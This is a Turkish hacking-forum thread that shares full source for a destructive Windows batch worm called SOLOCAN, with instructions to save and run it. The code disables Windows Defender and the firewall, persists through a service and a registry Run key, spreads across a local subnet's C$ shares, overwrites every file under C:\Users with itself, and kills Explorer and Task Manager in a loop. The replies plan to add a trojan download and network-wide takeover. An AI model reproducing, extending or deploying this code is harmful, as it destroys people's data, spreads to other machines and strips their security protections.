S O L O C A N Bat Zarar kodu!//_MaC_

_MaC_

Uzman üye
2 Ara 2009
1,360
3
Bilinmezden
Aşağıdaki kodu Not defterine yapıştırın. Uzantısını .bat olarak kaydedin. Örnek: SOLOCAN.bat

jWVAzn.jpg


Not: Kesinlikle kendi bilgisayarınızda denemeyin. Mesuliyet kabul etmem!

Özellikleri:
[*] Hizmet olarak çalışır.
[*] “net kullanımı” üzerinden ağdaki tüm bilgisayarları bulaşır.
[*] Ağdaki tüm kullanıcı hesaplarını bulaşır.
[*] C deki tüm dosyalara bulaşır.
[*] Kullanıcılar dosyasını gizler.
[*] Kayıt defterinde başlangıca kendini yazar.
[*] Görev Yöneticisini devre dışı bırakır.
[*] Masaüstünü kapatır.
[*] Windows Defender ve windows güvenlik duvarını kapatır.

Kod:
@echo off
rem <=-=-= Toplu Solucan =-=-=>
rem <=-=-= SOLOCAN  =-=-=>
set i=0
set servicename=SOLOCAN

rem <=== Hizmet Olarak Calis ===>
echo sc create %servicename% binpath=%0 >> service.bat
echo sc start %servicename% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== Baslangic ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== Güvenlik duvari ve Windows Defender'i oldur ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== Ag Bulas!!! ===>
:worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto infect) else (set /a i=i+1)
goto worm
rem <=== infect *.* in C:\Users ===>
:infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
:payload
taskkill /f /im "explorer.exe"
taskkill /f /im "taskmgr.exe"
echo msgbox "SOLOCAN simdi Seni Yakaladi!",1,"%username% wants the D" > solocan.vbs
start solocan.vbs
goto payload

Not:Win7 için, zararlı dosya yönetici modunda çalıştırılmalı.
 
Son düzenleme:

'Gladyo

Katılımcı Üye
1 Haz 2017
691
1
Ovvvv O Neymiş Öyle La :D Formatla Gider Demi ?
CD Yerini Vee İnterneti Devre Dışı Bırakabilirseniz O Başka O Da Yapılırmı ?
Tüm USB Ve CD Girişlerini Bloke Edebilecek Birşey..
 
Son düzenleme:

_MaC_

Uzman üye
2 Ara 2009
1,360
3
Bilinmezden
Ovvvv O Neymiş Öyle La :D Formatla Gider Demi ?
CD Yerini Vee İnterneti Devre Dışı Bırakabilirseniz O Başka O Da Yapılırmı ?
Tüm USB Ve CD Girişlerini Bloke Edebilecek Birşey..

Evet dediğin kodlarda var ama bunlarla zaten bilgisayarı öldürüyoruz. Ama elimde WormBuilder var ama paylaşmak için emin değilim.
 

_MaC_

Uzman üye
2 Ara 2009
1,360
3
Bilinmezden
Biryandan bende ypayim evdeki pc lerle zararli kodlari silip bakarim bulastigi pc lerde trojani acacakmi diye eger ise yararsa efsane olur :)

Ben şöyle düşünüyorum;
-Trojan(server) yapıp, onu bir siteye yüklemeliyiz.
-SOLOCAN kodlarının başında bilgisayarın güvenliğini devre dışı bıraktırmalıyız.
-Sonra trojanın url'sini çağırmalı ve trojanı indirip çalışmasını sağlamalıyız.
-Ağ ortamındaki bilgisayarlara da yukarıdaki aynı işlemi yapıp.
-Ardından Ağ ortamına yaymak için trojanı ağa yönlendirmeliyiz.
-Geri Artık bizim elimizde.
 

Sagopa K

Kıdemli Üye
10 Haz 2016
3,678
42
Melankolia
Ben şöyle düşünüyorum;
-Trojan(server) yapıp, onu bir siteye yüklemeliyiz.
-SOLOCAN kodlarının başında bilgisayarın güvenliğini devre dışı bıraktırmalıyız.
-Sonra trojanın url'sini çağırmalı ve trojanı indirip çalışmasını sağlamalıyız.
-Ağ ortamındaki bilgisayarlara da yukarıdaki aynı işlemi yapıp.
-Ardından Ağ ortamına yaymak için trojanı ağa yönlendirmeliyiz.
-Geri Artık bizim elimizde.


Bence bu zahmetli bir is direk binder denicem ben hem direk .exe yukleyebilecegin hosting var mi bedava ?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.